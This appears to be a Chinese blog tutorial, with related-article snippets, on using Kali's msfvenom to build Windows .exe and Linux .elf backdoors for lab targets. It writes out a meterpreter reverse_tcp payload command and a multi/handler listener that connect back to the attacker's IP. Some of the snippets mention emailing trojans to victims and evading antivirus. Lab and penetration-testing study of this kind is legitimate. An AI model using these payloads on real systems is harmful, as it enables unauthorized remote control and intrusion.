Kali实现msfvenom在Windows和Linux靶机下后门漏洞

最新推荐文章于 2025-05-28 17:37:06 发布
原创 最新推荐文章于 2025-05-28 17:37:06 发布 · 6.2k 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

本文介绍了如何使用Kali Linux的msfvenom工具在Windows 10和CentOS 7靶机上创建后门漏洞。通过设置不同平台的payload并指定Kali的IP地址和端口号,成功执行后可以获取靶机的网络信息。在Windows环境下生成.exe文件,在Linux环境下生成.elf文件,并详细说明了每个操作步骤。

项目场景:

Kali实现msfvenom在Windows和Linux靶机下后门漏洞

情景复现:

实验环境:Kali-Debian 6 64位、Windows10、Centos7

环境 版本
kali Debian 6 64位
Windows win 10
Linux Centos 7

实验过程:

以下命令可照着敲:
一、Windows 10靶机下
1、msfvenom -p windows/meterpreter/reverse_tcp LHOST=19x.xxx.xxx.xxx(Kali的IP地址) LPORT=4444(自定义端口号,可随意写) -f exe(exe为Windows下可执行文件后缀) > mumachengxu.exe(输出可执行文件的名称,自己取名字)
2、打开主文件夹可以看见刚刚生成的可执行文件,打开win10靶机,把刚刚生成的mumachengxu.exe拖进win10里面(如果有电脑管家或者360杀毒导致文件不在的,请点击找回来)

在这里插入图片描述

最低0.47元/天 解锁文章
渗透工具——kali中msf(后门生成模块msfvenom
2301_78006725的博客
09-02 1107
3. 通过邮件等方式上传到目标电脑,让目标电脑点击这个木马时,木马会在目标电脑后台运行(我这里就先用本机做一下试验)5. 然后run运行,同时点击桌面上的exe文件(不会出现画面,后进入后台运行)然后use exploit/multi/handler。成功拿到会话,就证明木马没问题,就可以进行操作啦!2. 点击文件管理,在root中查看是否已经生成完毕。show options完善信息。列出所有可用的payload;1. 生成shell。
2021-08-19 kali-msfvenom
白嫖怪的博客
08-19 1876
msf-> msfvenom 生成 运行前提: kali 操作系统中 运行权限为 root 用户 (用 sudo su 命令 切换到root ) root 根目录下进行输入 msfvenom 1.msfvenom msfvenom 是 msfpayload msfencode 的组合。将这两个工具集成在一个框架实例中 **进一步解释 ** : msfvenom 是用来生成后门的软件,在目标机上执行后门,在本地监听上线。 2.生成后门 #msfvenom 在bash shell 里使用
[Kali]--Msfvenom
wwxxee
11-06 1085
Msfvenom 参数 MsfVenom - a Metasploit standalone payload generator. Also a replacement for msfpayload and msfencode. Usage: /usr/bin/msfvenom [options] <var=val> Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST= -f exe -o payload.ex
网络安全Kali Linux 进行 MSFvenom 程序利用
cronaldo91的博客
03-06 1968
(6) 查看Kali Linux (2022.4)系统IP地址。(2)查看Kali Linux (2022.4)系统版本。(1)Ubuntu创建计划任务crontab程序。(7)Kali Linux 连接后门。(2)Kali Linux 连接后门。(13)Ubuntu再次后台运行。(4)Ubuntu查看权限。(6)Ubuntu后台执行。(15)查看用户权限及进程。(1)查看DES 对称加密。(9)设置响应的IP地址。(4)设置响应的IP地址。(10)设置响应的端口。(5)设置响应的端口。
kalimsfvenom
JackLiu16的博客
03-01 4632
导读:做作有攻击载荷的木马后,肉鸡反向链接,需要一个公网IP,然后是加壳绕过杀软,有被启动的机会。杀软通过特征码来识别程序行为来分析。特征行为如调用敏感的API,钩子函数等。属于逆向内容在kali2.0的环境上,因为msfpayload没有了,被整合进了msfvenom,所以这就只写一些关于msfvenom的东西。这里就只是记录下生成一个程序的过程。msfvenommsfvenom是msfpay...
Kali Linux渗透测试小实践——Metasploit与后门木马
PICACHU+++的博客
01-08 3276
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit综合报告提出了他们的发现。
kali 生成PHP木马病毒进行靶机控制
chidaoqiannianzq的博客
10-17 1713
Msfvenom 是 Metasploit Framework 的一个非常强大的工具,它结合了之前 msfpayload msfencode 的功能,用于生成各种类型的 Payloads,包括但不限于 shellcode、恶意文件、恶意链接等。Msfvenom 可以帮助渗透测试人员创建自定义的 Payloads,以用于渗透测试、漏洞利用红队行动中。
Metasploit 内网渗透四 —Metasploit 渗透测试之利用木马、病毒实施渗透1 — 制作 windows linux 客户端恶意软件进行渗透
天下著书立传者,皆为我师
05-29 2956
通过制作含病毒木马的恶意程序,利用msfvenom模块,完成靶机与msf相应的通信
Metasploitable2靶机渗透linux系统实操
以自己喜欢的方式过一生
11-07 1797
Metasploitable2靶机渗透linux系统实操
网络安全Kali Linux 进行 MSFvenom 程序利用_msfvenom -p linux
m0_60721695的博客
04-07 1060
(12)运行开启TCP反向侦听run(13)Ubuntu再次后台运行(14)已连接(15)查看用户权限及进程用户getuid进程号getpid(16) 进入内核shell查看用户whoami查看路径pwd(17)退出exit。
kali使用msfvenom生产木马,在使用msfconsole进行控制
qq_45031509的博客
07-13 1169
kali使用msfvenom生产木马,在使用msfconsole进行控制
Kali 利用 msfvenom 渗透 Windows 系统教程
xzc123111的博客
05-28 613
是一款开源的渗透测试工具,用于开发、测试执行漏洞利用程序。msfvenom是 Metasploit 中的 Payload 生成工具,融合了旧版本的msfpayload与msfencode。可用于生成后门程序,便于进行远程控制、提权等渗透测试任务。
保姆级攻略!Kali LinuxMSFvenom 程序利用全流程教学
Cairo_A的博客
04-24 843
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有。(6) 查看Kali Linux (2022.4)系统IP地址。(2)查看Kali Linux (2022.4)系统版本。(7)Kali Linux 连接后门。(2)Kali Linux 连接后门。(13)Ubuntu再次后台运行。(4)Ubuntu查看权限。(6)Ubuntu后台执行。
Kali工具之msfvenom初体验
qq_60778231的博客
02-22 479
msfvenomkali中生成远控木马的工具,在本地监听中上线,在目标机上执行后门。
利用msfvenom生产windows后门
shy的博客
11-05 2188
原理: 利用msfvenom制作shy .exe 文件,然后发送到靶机上面,运行后就可以在kali linux 上面利用msfconsole连接msfvenom服务控制靶机 1,根据靶机操作系统,搜索适合的生产后门文件的脚本 msfvenom -l | grep windows | grep x64 | grep tcp 2,选择生产脚本,生产后门文件 -p 选择一个payloa...
ctf:kali工具: msfvenom
viviliving的专栏
12-02 829
Options:
kali学习4——使用msfvenom制作exe木马
不会心跳的博客
01-29 6821
使用msfvenom制作exe木马文件 1. msfvenom msfvenom是msfpayload,msfencode的结合体。使用msfvenom制作木马的思路是,木马在目标机上执行后,向本机发送信息,而本机则需要开启监听状态,收到信息后则进行连接。 2. 制作木马 msfvenom制作木马需要的参数很多: root@kali:~# msfvenom -h MsfVenom - a Metasploit standalone payload generator. Also a replacement
kali实现远程控制-----msfvenom控制夺权
2301_81693492的博客
10-27 977
1.在kali中生成被控端;IP写kali的地址 2.在靶机ExpNIS.Windows中用浏览器下载并运行winpayload.exe; 3.打开主控端,启动metasploit,进入metasploit(msf)的控制台。 4.控制目标靶机 5.检测:在虚拟机中打开网站:www.virustotal.com;habo.qq.com;上传下载的
Kali上访问Windows10搭建的靶机
最新发布
07-10
要从 Kali Linux 系统访问基于 Windows 10 搭建的测试靶机,可以通过多种方式实现。以下是几种常见的方法: ### ### 使用 SMB 协议访问文件共享 Windows 10 支持通过 SMB(Server Message Block)协议进行文件共享。Kali Linux 可以使用 `smbclient` 工具访问这些共享资源。 ```bash smbclient //Windows_IP_Address/Shared_Folder_Name -U Windows_Username ``` 输入密码后,可以浏览操作共享文件夹中的内容[^3]。 如果需要挂载该共享目录到本地文件系统,可使用以下命令: ```bash mount.cifs //Windows_IP_Address/Shared_Folder_Name /mnt/local_mount_point -o user=Windows_Username ``` ### ### 使用远程桌面协议 (RDP) 如果目标 Windows 10 启用了远程桌面服务,则可以通过 `xfreerdp` 或 `rdesktop` 工具进行连接。 ```bash xfreerdp /v:Windows_IP_Address /u:Windows_Username /p:Windows_Password ``` 这种方式提供了图形界面访问能力,适合需要 GUI 操作的场景。 ### ### 利用 PowerShell 远程管理 如果目标 Windows 10 启用了 WinRM(Windows Remote Management),则可以使用 `winexe` 或 `crackmapexec` 等工具执行远程命令。 ```bash winexe -U Windows_Username%Windows_Password //Windows_IP_Address "ipconfig" ``` 这种方法适用于执行远程命令或脚本。 ### ### 使用 Metasploit Framework 建立会话 如果已经获取了 Windows 10 靶机的权限,例如通过漏洞利用获得了 Meterpreter 会话,则可以直接在 Metasploit 中与目标交互。 ```bash use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST Kali_IP_Address set LPORT Listening_Port exploit ``` 一旦建立了会话,就可以上传文件、执行命令或进一步渗透。 ### ### 网络发现与枚举 在开始之前,确保能够发现目标 Windows 10 主机。可以使用 `nbtscan` 或 `netbios-ssn` 扫描来识别网络上的 Windows 设备。 ```bash nbtscan 192.168.1.0/24 ``` 此步骤有助于确认目标的存在并收集基本信息如 NetBIOS 名称、工作组等[^3]。 ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值